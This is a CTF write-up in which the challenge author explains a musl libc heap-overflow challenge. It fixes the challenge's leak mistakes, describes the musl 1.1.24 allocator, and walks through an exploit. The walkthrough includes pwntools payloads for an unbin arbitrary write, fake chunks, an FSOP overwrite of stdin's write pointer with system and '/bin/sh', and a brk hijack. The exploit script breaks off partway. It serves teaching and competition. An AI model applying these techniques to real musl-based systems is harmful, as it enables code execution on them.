This article uses a CTF topic to show how to exploit the musl libc heap overflow vulnerability.
0. Preface
The 2020 XCTF college war "epidemic" ended on March 9th. On behalf of the Xp0int team of Jinan University , I contributed a PWN question musl.
The focus of the topic is the exploitation of heap vulnerabilities under musl libc, mainly the implementation of musl libc heap manager and the exploitation of heap overflow vulnerabilities. Compared with the traditional glibc, the musl libc heap manager is very simple, the core source code is less than 400 lines, so as long as you read the source code carefully, you can easily find out how to exploit the vulnerabilities even if you haven't learned about musl libc before.
(The original name of the question was carbon, but for some reason, the name changed to musl...)
This article starts from the subject of musl and introduces the method of exploiting musl libc heap vulnerabilities. It is divided into three parts: the first part explains the mistakes in the question, the second part is an overview of the implementation of the musl libc heap manager, and finally the topic analysis and exploit .
For the first submission, I hope you can give me your advice.
1. Make a mistake
In fact, this is the first time I have asked questions for a CTF competition for the public. I have only asked some simple basic questions for novices in the school . I was very careful when setting the questions, and spent a lot of time deliberately to consolidate the questions to prevent mistakes and unexpected solutions. In the end, all the great gods found an unexpected solution, which broke the problem. . .
After review, I found two mistakes. The main reason is that the problem was not carefully checked and extra information was leaked to the players. Next, let's talk about the mistakes that occurred and how to fix them.
void init()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if( LIST == (struct item*)-1 ) {
echo("ERROR: Unable to mmapn");
a_crash();
}
alarm(30);
}
Both errors are located in the init
function ( sub_400B77
). The above is init
the source code of the function, which is used to initialize the problem environment.
1.1 Stack address
The biggest mistake is not clearing the stack address on the libc library.
The expected solution to the problem is to use FSOP to hijack the program control flow, but if the stack address can be leaked, the ROP chain can be written directly to the stack. After the game, I took a look at the WP online, and most of them got the shell through this method.
pwndbg> leakfind $libc+0x292000 --page_name=stack --max_offset=0x4000 --max_depth=1
0x7ffff7ffb000+0x32f0 0x7fffffffe600 [stack]
0x7ffff7ffb000+0x31f8 0x7fffffffe390 [stack]
0x7ffff7ffb000+0x2fd8 0x7fffffffe4d8 [stack]
0x7ffff7ffb000+0x3000 0x7fffffffe765 [stack]
0x7ffff7ffb000+0x3008 0x7fffffffe770 [stack]
0x7ffff7ffb000+0x2908 0x7fffffffefe6 [stack]
The repair method is very simple. First use it to pwdbg
search the BSS section of the libc library where the stack address can be leaked.
#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0;
Then init
clear them one by one in the function.
1.2 mmap
Another mistake is mmap
to misuse the function, resulting in LIST
address leakage.
//void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
The problem is the addr
parameters. When addr
is 0
the time, mmap
to find a vacant area in the memory space of the program, and then return to the first address of the area to the user, but this address is not random.
In gdb
can be found, the LIST
memory location is located just libc libraries, and have a fixed offset from the base address libc 0x28c000
(libc base address can leak), which leads to LIST
leakage of the address.
The expected solution is to use the method of hijacking the bin linked list to return an arbitrary pointer to achieve arbitrary address writing. However, if the LIST
address is known , LIST
the pointer address above can be rewritten by direct hijacking .
//generate a 40 bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
a_crash();
close(fd);
addr &= ~0xFFF;
LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
echo("ERROR: Unable to mmapn");
a_crash();
}
addr = 0;
The fix is to /dev/urandom
randomly generate a 40-bit address and addr
pass it to the mmap
function as a parameter . The program cannot open the PIE, because opening the PIE will cause the bypass 0xbadbeef
method in the expected solution to be invalid.
After repair, it LIST
is a random address.
void init()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
//generate a 40 bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
a_crash();
close(fd);
addr &= ~0xFFF;
LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
echo("ERROR: Unable to mmapn");
a_crash();
}
addr = 0;
#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0;
alarm(30);
}
The above is init
the source code of the repaired function.
2. Overview of musl libc heap manager
musl libc is a lightweight libc library specially developed for embedded systems, featuring simplicity, light weight and high efficiency. There are many Linux distributions that set it as the default libc library to replace the bloated glibc, such as Alpine Linux (you should be familiar with Docker images), OpenWrt (usually used in routers), and Gentoo.
Due to space, I will only talk about the difference between musl libc heap manager and glibc, some data structures, the implementation of malloc and free, and static heap memory. The version of musl libc used in this article is v1.1.24 .
In principle, this memory allocator is roughly equivalent to Doug
Lea's dlmalloc with fine-grained locking.
malloc:
Uses a freelist binned by chunk size, with a bitmap to optimize
searching for the smallest non-empty bin which can satisfy an
allocation. If no free chunks are available, it creates a new chunk of
the requested size and attempts to merge it with any existing free
chunk immediately below the newly created chunk.
Whether the chunk was obtained from a bin or newly created, it's
likely to be larger than the requested allocation. malloc always
finishes its work by passing the new chunk to realloc, which will
split it into two chunks and free the tail portion.
According to the design document , the musl libc heap manager is approximately equivalent to dlmalloc
( ptmalloc2
the predecessor of the glibc heap manager ), so some parts such as chunk and unbin are very similar to glibc.
The big difference from glibc is the design of bin. In musl libc, bin is composed of 64 two-way circular linked lists with a structure similar to small bins. Bitmap is used to record whether each linked list is not empty. The way to maintain the linked list is FILO (remove the chunk from the beginning of the linked list and insert the chunk from the end). Each bin has a different size range for holding chunks. The smallest can only hold one size of chunk, and the largest can hold up to 1024 chunks of different sizes.
musl libc does not implement hook functions such as __malloc_hook
and __free_hook
, so it cannot hijack program control flow directly through the heap. In addition, in a 64-bit system, the chunk size is aligned to 32 bytes, which is different from the glibc 16 byte alignment, so the minimum chunk size is 0x20 bytes, and then gradually increases according to 0x40, 0x60, 0x80...
For performance reasons, the musl libc heap manager omits many security checks, especially the validity check of chunk pointers, so the heap vulnerabilities of musl libc are easy to exploit.
The source code of malloc and free is located src/malloc/malloc.c
, and some structures and macro definitions are located src/internal/malloc_impl.h
.
2.1 Data structure
struct chunk {
size_t psize, csize;// glibc prev size size
struct chunk *next, *prev;
};
The chunk header structure is similar to glibc, but there are no nextsize
pointers, and psize
fields are not reused between chunks .
psize
csize
Both and fields have flag bits (glibc only has size
fields), but there is only one flag bit in the lowest bit INUSE
(glibc has flag bits in the lowest three bits). If the INUSE
flag bit is set (the lowest bit is 1), it means that the chunk is being used; if the INUSE
flag bit is not set (the lowest bit is 0), it means that the chunk has been released or mmap
allocated. psize
The flag bit that needs to be passed to further judge the state of the chunk .
static struct {
volatile uint64_t binmap;
struct bin bins[64];
volatile int free_lock[2];
} mal;
mal
The structure is similar to that in glibc, arena
which records the state of the heap and has three members: a 64-bit unsigned integer binmap
, a linked list header array, bins
and a lock free_lock
. binmap
Record whether each bin is non-empty. If a bit is 1, it means that the corresponding bin is non-empty, that is, there are chunks in the bin linked list.
struct bin {
volatile int lock[2];
struct chunk *head;
struct chunk *tail;
};
The structure of the header of the bin linked list is as above. head
The and tail
pointers point to the head and tail chunks respectively, prev
and the next
pointers of the head chunk and the tail chunk point to the head of the bin linked list, thus forming a circular linked list. When the linked list is empty, the head
sum tail
pointer is equal to 0 or points to the head of the linked list itself.
bin subscript i | Number of chunks | chunk size range | The relationship between subscript i and chunk size range |
---|---|---|---|
0-31 | 1 | 0x20 0x400 | (i+1) * 0x20 |
32-35 | 8 | 0x420 0x800 | (0x420+(i-32) 0x100) ~ (0x500+(i-32) 0x100) |
36-39 | 16 | 0x820 0x1000 | (0x820+(i-36) 0x200) ~ (0x1000+(i-36) 0x200) |
40-43 | 32 | 0x1020 0x2000 | (0x1020+(i-40) 0x400) ~ (0x1400+(i-40) 0x400) |
44-47 | 64 | 0x2020 0x4000 | (0x2020+(i-44) 0x800) ~ (0x2800+(i-44) 0x800) |
48-51 | 128 | 0x4020 0x8000 | (0x4020+(i-48) 0x1000) ~ (0x5000+(i-48) 0x1000) |
52-55 | 256 | 0x8020 0x10000 | (0x8020+(i-52) 0x2000) ~ (0xa000+(i-52) 0x2000) |
56-59 | 512 | 0x10020 0x20000 | (0x10020+(i-56) 0x4000) ~ (0x14000+(i-56) 0x4000) |
60-62 | 1024 | 0x20020 0x38000 | (0x20020+(i-60) 0x8000) ~ (0x28000+(i-60) 0x8000) |
63 | unlimited | 0x38000 and above | 0x38000 ~ |
The above is the chunk size range of each bin, which can be obtained from the function in the source codebin_index_up
deduced from . The first 32 bins are similar to fastbin and small bin, and each bin corresponds to chunks of one size; the last 32 bins are similar to large bins, and one bin corresponds to chunks of multiple sizes.
For example, when the bin subscript is 34, it can be seen that the chunk size ranges from 0x620 to 0x700, that is, 0x620, 0x640, 0x660, 0x680, 0x6b0, 0x6d0, 0x6e0, and 0x700, a total of 8 chunks.
2.2 malloc implementation
//src/malloc/malloc.c L284-L331
void *malloc(size_t n)
{
struct chunk *c;
int i, j;
//1. n OVERHEAD (0x10) 32
//*n = (*n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
if (adjust_size(&n) < 0) return 0;
// n MMAP_THRESHOLD (0x38000) mmap chunk
if (n > MMAP_THRESHOLD) {
[...]
return CHUNK_TO_MEM(c);
}
//2. n bin i
i = bin_index_up(n);
for (;;) {
//3. binmap
uint64_t mask = mal.binmap & -(1ULL<<i);
// bin expand_heap chunk
if (!mask) {
c = expand_heap(n);
[...]
break;
}
//4. n bin j
j = first_set(mask);
lock_bin(j);
c = mal.bins[j].head;//c bin j chunk
//5. pretrim c unbin c
if (c != BIN_TO_CHUNK(j)) {
if (!pretrim(c, n, i, j)) unbin(c, j);
unlock_bin(j);
break;
unlock_bin(j);
}
//6. c n
/* Now patch up in case we over-allocated */
trim(c, n);
return CHUNK_TO_MEM(c);
}
The implementation of malloc is very simple. The main step is to first select the bin through binmap, and then take out the chunk at the head of the bin linked list. There is no check on the linked list and the chunk header in the process of removing the chunk.
Malloc detailed steps:
- Adjust
n
, increase the head length and align 32 bits. - If you
n > MMAP_THRESHOLD
usemmap
to create a sizen
of memory, returned to the user. - If
n <= MMAP_THRESHOLD
, calculatingn
the corresponding bin indexi
, look binmap- If all available bins are empty, extend the heap space and generate a new chunk
- If the presence of a non-empty bin is available, select the closest size
n
to the binj
, the bin to obtain the list header chunkc
- If they meet
pretrim
the conditions, the use ofpretrim
splitc
- Otherwise, use the
unbin
Remove from the listc
- If they meet
- Finally, the chunk is processed
trim
and returned to the user.
Next, let's talk briefly about unbin
, pretrim
and trim
.
//src/malloc/malloc.c L188-L213
static void unbin(struct chunk *c, int i)
{
// bin chunk bin bin
if (c->prev == c->next)
a_and_64(&mal.binmap, ~(1ULL<<i));
// chunk
c->prev->next = c->next;
c->next->prev = c->prev;
// INUSE
c->csize |= C_INUSE;
NEXT_CHUNK(c)->psize |= C_INUSE;
}
unbin
It is equivalent to that in glibc, unlink
and the function is to remove chunks from the bin doubly linked list. In the process of fetching, it is unbin
not checked whether the chunk pointer is legal.
//src/malloc/malloc.c L233-L264
/* pretrim - trims a chunk _prior_ to removing it from its bin.
* Must be called with i as the ideal bin for size n, j the bin
* for the _free_ chunk self, and bin j locked. */
static int pretrim(struct chunk *self, size_t n, int i, int j)
{
size_t n1;
struct chunk *next, *split;
// 1: bin j 40
/* We cannot pretrim if it would require re-binning. */
if (j < 40) return 0;
// 2: bin j i 3 bin
// j 63 split MMAP_THRESHOLD
if (j < i+3) {
if (j != 63) return 0;
n1 = CHUNK_SIZE(self);
if (n1-n <= MMAP_THRESHOLD) return 0;
} else {
n1 = CHUNK_SIZE(self);
}
// 3: split bin j split self bin
if (bin_index(n1-n) != j) return 0;
// n chunk
next = NEXT_CHUNK(self);
split = (void *)((char *)self + n);
split->prev = self->prev;
split->next = self->next;
split->prev->next = split;
split->next->prev = split;
split->psize = n | C_INUSE;
split->csize = n1-n;
next->psize = n1-n;
self->csize = n | C_INUSE;
return 1;
}
pretrim
The function is to cut large chunks and prevent chunks whose size exceeds the demand from being allocated to users. When certain conditions are met, pretrim
a small chunk of the size just meets the requirements is cut from the first chunk of the bin linked list, and then the small chunk is allocated to the user, and the position of the first chunk of the linked list remains unchanged.
//src/malloc/malloc.c L266-L282
static void trim(struct chunk *self, size_t n)
{
size_t n1 = CHUNK_SIZE(self);
struct chunk *next, *split;
// self n1 n DONTCARE (0x10)
if (n >= n1 - DONTCARE) return;
// self n chunk split
next = NEXT_CHUNK(self);
split = (void *)((char *)self + n);
split->psize = n | C_INUSE;
split->csize = n1-n | C_INUSE;
next->psize = n1-n | C_INUSE;
self->csize = n | C_INUSE;
// split bin
__bin_chunk(split);
}
The last step of malloc is trim
that the main function is to reclaim the chunk that exceeds the required size. trim
Cut the excess part of the chunk and release it to the bin to reduce memory waste.
2.3 free implementation
//src/malloc/malloc.c L519-L529
void free(void *p)
{
if (!p) return;
struct chunk *self = MEM_TO_CHUNK(p);
// csize INUSE mmap chunk double free
//#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))
if (IS_MMAPPED(self))
unmap_chunk(self);
else
__bin_chunk(self);
}
//src/malloc/malloc.c L509-L517
static void unmap_chunk(struct chunk *self)
{
size_t extra = self->psize;
char *base = (char *)self - extra;
size_t len = CHUNK_SIZE(self) + extra;
// prev size INUSE double free crash
/* Crash on double free */
if (extra & 1) a_crash();
__munmap(base, len);
}
free first checks the chunk for mmap/double free. If the chunk csize
field does not set the INUSE
flag bit, enter the unmap_chunk
function check psize
field. If psize
the INUSE
flag bit is set in the field, it is regarded as double free and crash; otherwise, it is regarded as mmap chunk and __munmap
is released by calling the function.
//src/malloc/malloc.c L440-L507
void __bin_chunk(struct chunk *self)
{
struct chunk *next = NEXT_CHUNK(self);
size_t final_size, new_size, size;
int reclaim=0;
int i;
//new_size self final_size self chunk
final_size = new_size = CHUNK_SIZE(self);
// chunk psize self csize crash
/* Crash on corrupted footer (likely from buffer overflow) */
if (next->psize != self->csize) a_crash();
//1. self chunk
for (;;) {
if (self->psize & next->csize & C_INUSE) {
// INUSE
self->csize = final_size | C_INUSE;
next->psize = final_size | C_INUSE;
// final_size bin i
i = bin_index(final_size);
lock_bin(i);
lock(mal.free_lock);
if (self->psize & next->csize & C_INUSE)
break; //
unlock(mal.free_lock);
unlock_bin(i);
}
// chunk
if (alloc_rev(self)) { // bin chunk
self = PREV_CHUNK(self);
size = CHUNK_SIZE(self);
final_size += size;
if (new_size+size > RECLAIM && (new_size+size^size) > size)
reclaim = 1;
}
// chunk
if (alloc_fwd(next)) { // bin chunk
size = CHUNK_SIZE(next);
final_size += size;
if (new_size+size > RECLAIM && (new_size+size^size) > size)
reclaim = 1;
next = NEXT_CHUNK(next);
}
}
//2. binmap bin i bin
if (!(mal.binmap & 1ULL<<i))
a_or_64(&mal.binmap, 1ULL<<i);
self->csize = final_size;
next->psize = final_size;
unlock(mal.free_lock);
//3. self bin i
self->next = BIN_TO_CHUNK(i);
self->prev = mal.bins[i].tail;
self->next->prev = self;
self->prev->next = self;
/* Replace middle of large chunks with fresh zero pages */
if (reclaim) {
[...]
}
unlock_bin(i);
}
__bin_chunk
The function of the function is to insert chunks into the bin linked list. First merge the free chunks before and after the chunk, set the binmap and chunk flags, and finally insert the chunk into the corresponding bin linked list.
2.4 Static heap memory
In glibc, the heap is generally located in a dynamic memory area in memory. In order to reduce the memory overhead, the musl libc heap manager divides the free memory of the program and libc library (static memory) into heap memory, and preferentially uses static heap memory to allocate chunks. Only when the static heap memory is exhausted or cannot meet the demand, musl libc will apply for dynamic memory.
Next, let s introduce how musl libc implements this feature.
void __dls3(size_t *sp)
{
[...]
//ldso/dynlink.c L1839-L1840
/* Donate unused parts of app and library mapping to malloc */
reclaim_gaps(&app);
reclaim_gaps(&ldso);
[...]
}
During the initialization process, musl libc calls reclaim_gaps
functions to find and release the free memory of the program and libc library.
//ldso/dynlink.c L526-L552
/* A huge hack: to make up for the wastefulness of shared libraries
* needing at least a page of dirty memory even if they have no global
* data, we reclaim the gaps at the beginning and end of writable maps
* and "donate" them to the heap. */
static void reclaim(struct dso *dso, size_t start, size_t end)
{
// RELRO
if (start >= dso->relro_start && start < dso->relro_end) start = dso->relro_end;
if (end >= dso->relro_start && end < dso->relro_end) end = dso->relro_start;
if (start >= end) return;
char *base = laddr_pg(dso, start);
// __malloc_donate bin
__malloc_donate(base, base+(end-start));
}
static void reclaim_gaps(struct dso *dso)
{
Phdr *ph = dso->phdr;
size_t phcnt = dso->phnum;
//
for (; phcnt--; ph=(void *)((char *)ph+dso->phentsize)) {
// 1 PT_LOAD
if (ph->p_type!=PT_LOAD) continue;
// 2
if ((ph->p_flags&(PF_R|PF_W))!=(PF_R|PF_W)) continue;
// reclaim
reclaim(dso, ph->p_vaddr & -PAGE_SIZE, ph->p_vaddr);
reclaim(dso, ph->p_vaddr+ph->p_memsz,
ph->p_vaddr+ph->p_memsz+PAGE_SIZE-1 & -PAGE_SIZE);
}
}
reclaim_gaps
Function through each memory segment, if find qualified, calculated memory page segment belongs to ~
, and ~
passed to the two free memory block reclaim
functions by finally __malloc_donate
released into the bin function.
After musl libc is initialized, it gdb
can be found that there are two chunks in the bin, and their memory locations happen to be located in the libc library and program. malloc can use trim
or pretrim
cut these two chunks to generate multiple chunks and assign them to users.
This feature is conducive to information leakage in the process of exploiting: if a chunk address is known, it is equivalent to leaking the libc base address or program base address; on the contrary, if the libc base address or program base address can be leaked, any calculation can be made. The address of the chunk.
3. Topic analysis
Title source code: github.com/xf1les/XCTF...
Run build.sh under the source directory to compile libc library and carbon program with debugging information.
root@4124cf40a89b:/pwn/Debug# ./libc.so
musl libc (x86_64)
Version 1.1.24
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
root@4124cf40a89b:/pwn/Debug# checksec carbon
[*] '/pwn/Debug/carbon'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
The program opens all protection mechanisms except PIE, and the musl libc version is 1.1.24.
1) Assign sleeves
2) Destory sleeves
3) Transform sleeves
4) Examine sleeves
5) Real death
>
Typical menu questions, you can add, delete, edit and display piles. The following places need attention:
- add allows the heap to overflow once, and the overflow length is 0x50 bytes.
- There is only one place to call the
exit
function: when the address of the pointer returned by malloc is0xbadbeef
time. - The view can only be used once.
4. Vulnerability Exploitation
Vulnerability exploitation is mainly divided into three steps: the first step is to leak the libc base address; the second step is to rewrite the pointer field of the first chunk of the linked list through heap overflow, and use unbin to write arbitrary addresses; the third step is to lay out FSOP and modify the internal variables of the heap through exit
functions Trigger the FSOP and get the shell.
4.1 Leaking libc base address
To apply for a chunk with a size less than 0x400 bytes, the first 8 bytes of the chunk are the address of the header of the bin linked list remaining when unbin. If you use a view that can only be used once, the libc base address can be leaked.
add(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, 'x00')) - 0x292e41 # bin[0]
When the chunk size is 0x20 bytes, the offset of mal.bins[0]
the linked list head pointed to by the address mal+832
relative to the base address is 0x292e00.
4.2 Use unbin to achieve arbitrary address writing
Unbin does not check whether the prev
sum next
pointer is legal. We can rewrite these two pointers through heap overflow, and use unbin to write the pointer address to any address, that is, the *(uint64_t*)(prev + 2) = next
sum *(uint64_t*)(next + 3) = prev
.
As shown in the figure, it mal.bins[38]
is a non-empty bin. We can build a fake chunk near the memory block to be controlled, use unbin to write the fake chunk address to the mal.bins[38]->head
pointer, and malloc
return to the fake chunk by hijacking the bin linked list to achieve arbitrary address writing.
4.2.1 Hijacking the bin list
add(0x10, 'A'*0x10) #1
add(0x10, 'B'*0x10) #2, prevent consolidation
add(0x10, 'C'*0x10) #3
add(0x10, 'D'*0x10) #4, prevent consolidation
free(1)
free(3)
First allocate 4 chunks with a size of 0x20 bytes, and then release chunk 1 and chunk 3. The released chunk enters the mal.bins[0]
linked list, and the mal.bins[0]->head
pointer points to chunk 1.
bin = libc_base + 0x292e40 # mal.bins[38]->head
next = bin - 0x10
prev = fake_chunk
payload = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(next) + p64(prev)
payload += p8(0x20)
payload += 'n'
add(0x10, payload, 'Y') #1, heap overflow
Then allocate a 0x20 byte chunk, malloc mal.bins[0]
fetches head
the chunk 1 pointed to by the head
pointer , and updates the pointer to chunk 3. The heap overflows chunk 1, and the chunk 3 prev
pointer is rewritten . The next
pointer is the fake chunk address and mal.bins[38]->head
pointer address.
add(0x10) # 3, unbin #1
The 0x20 byte chunk is allocated again, malloc unbins chunk 3 and writes the fake chunk address to the mal.bins[38]->head
pointer.
add(0x50) # 5, fake chunk
Finally, a 0x60 byte chunk is allocated, and malloc mal.bins[38]
takes out the fake chunk and returns the fake chunk address.
edit(3, p64(next) + p64(prev2))
add(0x10) # 3, unbin #2
add(0x50) # 5, fake_chunk #2
edit(3, p64(next) + p64(prev3))
add(0x10) # 3, unbin #3
add(0x50) # 6, fake_chunk #3
edit(3, p64(next) + p64(prev4))
add(0x10) # 3, unbin #4
add(0x50) # 7, fake_chunk #4
edit(3, p64(next) + p64(prev5))
add(0x10) # 3, unbin #5
add(0x50) # 8, fake_chunk #5
[......]
Since the mal.bins[0]
linked list has been destroyed, the mal.bins[0]->head
pointer is no longer updated and continues to point to chunk 3. By continuously modifying the prev
pointer of chunk 3 , we can achieve multiple arbitrary address writes.
4.2.2 Construct fake chunk
Since malloc does not check the header of the chunk, as long as the prev
sum next
pointer of the fake chunk points to a legal address, it can be taken out of the bin linked list through unbin, that is *(uint64_t*)(fake_chunk + 2)
, *(uint64_t*)(fake_chunk + 3)
the value of the sum is a writable memory block address.
In addition to using existing fake chunks, we can also use unbin to construct fake chunks on any memory block:
fake_chunk = target - 0x10
edit(3, p64(fake_chunk) + p64(fake_chunk))
add(0x10) # 3, unbin
Assume that the address of the memory block to be controlled is target
. Set the prev
and next
pointers of chunk 3 at the same time target - 0x20
, and then unbin.
Before unbin.
After unbin, the prev
sum next
pointer of the fake chunk is rewritten to the fake chunk address by unbin, which just meets the construction conditions.
free(n) # chunk n 0x20
Then release a chunk of 0x20 bytes.
//src/malloc/malloc.c L188-L191
static void unbin(struct chunk *c, int i)
{
if (c->prev == c->next)
a_and_64(&mal.binmap, ~(1ULL<<i));
[...]
}
void __bin_chunk(struct chunk *self)
{
[...]
//src/malloc/malloc.c L482-L483
if (!(mal.binmap & 1ULL<<i))
a_or_64(&mal.binmap, 1ULL<<i);
[...]
}
This is because when prev
and next
equal pointer, unbin will be mal.bins[0]
set to the empty bin. It is mal.bins[0]
unavailable As long as any chunk of 0x20 is released, it mal.bins[0]
can be reset to a non-empty bin.
Note that there can be no free chunks before and after the chunk to be released, otherwise free will merge it, causing the chunk to be released to other bins.
edit(3, p64(bin - 0x10) + p64(fake_chunk))
add(0x10) # 3, unbin
add(0x50) # n+1, target
Finally, use unbin to write the fake_chunk address to the mal.bins[38]->head
pointer, and finally control it target
.
4.3 FSOP
After leaking the libc base address and implementing arbitrary address writing, the next step is to consider how to hijack the program control flow to get the shell. musl libc does not have a similar __malloc_hook
hook function that can easily hijack the control flow. The only feasible method at present is to do FSOP and cover FILE
the function pointer on the structure (if the unexpected solution mentioned above is not considered).
pwndbg> ptype stdin
type = struct _IO_FILE {
unsigned int flags;
unsigned char *rpos;
unsigned char *rend;
int (*close)(FILE *);
unsigned char *wend;
unsigned char *wpos;
unsigned char *mustbezero_1;
unsigned char *wbase;
size_t (*read)(FILE *, unsigned char *, size_t);
size_t (*write)(FILE *, const unsigned char *, size_t);
off_t (*seek)(FILE *, off_t, int);
unsigned char *buf;
size_t buf_size;
FILE *prev;
FILE *next;
int fd;
int pipe_pid;
long lockcount;
int mode;
volatile int lock;
int lbf;
void *cookie;
off_t off;
char *getln_buf;
void *mustbezero_2;
unsigned char *shend;
off_t shlim;
off_t shcnt;
FILE *prev_locked;
FILE *next_locked;
struct __locale_struct *locale;
} * const
pwndbg> vmmap stdin
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x7ffff7ffb000 0x7ffff7ffc000 rw-p 1000 92000 /pwn/Debug/libc.so
pwndbg>
The above is _IO_FILE
the definition of the structure. musl libc version _IO_FILE
structure of the vtable no specific, only four function pointers close
, read
, write
and seek
and distributed in different locations in the structure. Since the memory block where the stin
, stdout
and stderr
structure are located is writable, we can rewrite the above content by writing to any address.
//sub_400E07
p = (char *)malloc(size);
if ( p == (char *)0xBADBEEF )
{
sub_400AEC("ERROR: Bad beefn");
exit(-1);
}
In the program, a exit
function is called in one place .
//src/exit/exit.c L27-L33
_Noreturn void exit(int code)
{
__funcs_on_exit();
__libc_exit_fini();
__stdio_exit(); <---
_Exit(code);
}
//src/stdio/__stdio_exit.c L16-L23
void __stdio_exit(void)
{
FILE *f;
for (f=*__ofl_lock(); f; f=f->next) close_file(f);
close_file(__stdin_used); <---
close_file(__stdout_used);
close_file(__stderr_used);
}
//src/stdio/__stdio_exit.c L8-L14
static void close_file(FILE *f)
{
if (!f) return;
FFINALLOCK(f);
if (f->wpos != f->wbase) f->write(f, 0, 0); <---
if (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);
}
Looking through the source code, I found that the exit
function later called the __stdio_exit
function to close all open file streams. In close_file
function, the file stream if f
eligible f->wpos != f->wbase
, then call f
on the file structure of write
function pointers: f->write(f, 0, 0)
.
payload = "/bin/shx00" # stdin->flags
payload += 'X' * 32
payload += p64(0xdeadbeef) # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead) # stdin->wbase
payload += 'X' * 8
payload += p64(system) # stdin->write
edit(stdin, payload)
The condition for triggering FSOP is very simple: just stdin
write to the first 8 bytes of the structure /bin/shx00
, write
point the pointer to the system
function, stdin->wpos != stdin->wbase
and finally call the exit
function to get the shell.
In addition to exit
functions, there are similar FSOP trigger points in standard IO library functions such as scanf
, printf
and puts
. If you are interested, you can read the source code of related functions yourself.
4.4 Return 0xBADBEEF
But if you want to call a exit
function, the malloc
returned address must be 0xBADBEEF
, which 0xBADBEEF
is obviously not a valid memory address. By modifying a brk
global variable named inside libc , it will not only 0xBADBEEF
become an address that can be accessed normally, but also malloc
return the address.
//src/malloc/malloc.c L303-L315
void *malloc(size_t n)
{
[...]
for (;;) {
uint64_t mask = mal.binmap & -(1ULL<<i);
// bin expand_heap chunk
if (!mask) {
c = expand_heap(n); <---
if (!c) return 0;
// chunk
if (alloc_rev(c)) {
struct chunk *x = c;
c = PREV_CHUNK(c);
NEXT_CHUNK(x)->psize = c->csize =
x->csize + CHUNK_SIZE(c);
}
break;
}
[...]
}
When all available bins are empty, malloc
call the expand_heap
function to extend the heap memory space and generate a new chunk. expand_heap
The function is called inside the __expand_heap
function.
//src/malloc/expand_heap.c L39-L61
void *__expand_heap(size_t *pn)
{
static uintptr_t brk; //brk
static unsigned mmap_step;
size_t n = *pn; //n chunk
//n 0x7FFFFFFFFFFFEFFF
if (n > SIZE_MAX/2 - PAGE_SIZE) {
errno = ENOMEM;
return 0;
}
n += -n & PAGE_SIZE-1;
// brk NULL
if (!brk) {
brk = __syscall(SYS_brk, 0);
brk += -brk & PAGE_SIZE-1;
}
// brk brk+n
// brk
if (n < SIZE_MAX-brk && !traverses_stack_p(brk, brk+n)
&& __syscall(SYS_brk, brk+n)==brk+n) { <---
*pn = n;
brk += n;
return (void *)(brk-n);
}
// brk mmap
[...]
}
In the __expand_heap
function, it brk
is a pointer to the end of the data segment (dynamic memory). __expand_heap
The function calls the brk system call __syscall(SYS_brk, brk+n)
to extend the end of the data segment backward by n
bytes, and then the extended part is returned tomalloc
be allocated to the user as a new chunk.
If the program does not enable PIE, the address length of the data segment is 24 bits ( 0~0x2000000
), and the memory location is 0xBADBEEF
relatively close. If the brk
pointer is modified to 0xBADBEEF - n
, the brk system call will extend the data segment to 0xBADBEEF
make it an accessible memory address.
edit(binmap, 'X' * 16 + p64(0))
edit(brk, p64(0xbadbeef - 0x20))
add(0) # 0xbadbeef
Set mal.binmap
to NULL
, brk
set 0xbadbecf
, and then add(0)
allocate a 0x20 byte chunk, and finally get it 0xBADBEEF
.
Note that the mal.binmap
fake chunk needs to be constructed in the previous place to prevent the original binmap
value from being destroyed .
4.5 Using scripts
The exploit Python script is as follows:
#!/usr/bin/env python2
from pwn import *
import sys
context(arch="amd64", log_level="debug")
if len(sys.argv) >= 3:
p = remote(sys.argv[1], sys.argv[2])
else:
p = process("./carbon")
def alloc(sz, ctx='n', ans='N'):
p.sendlineafter(">", '1')
p.sendlineafter("What is your prefer size? >", str(sz))
p.sendlineafter("Are you a believer? >", ans)
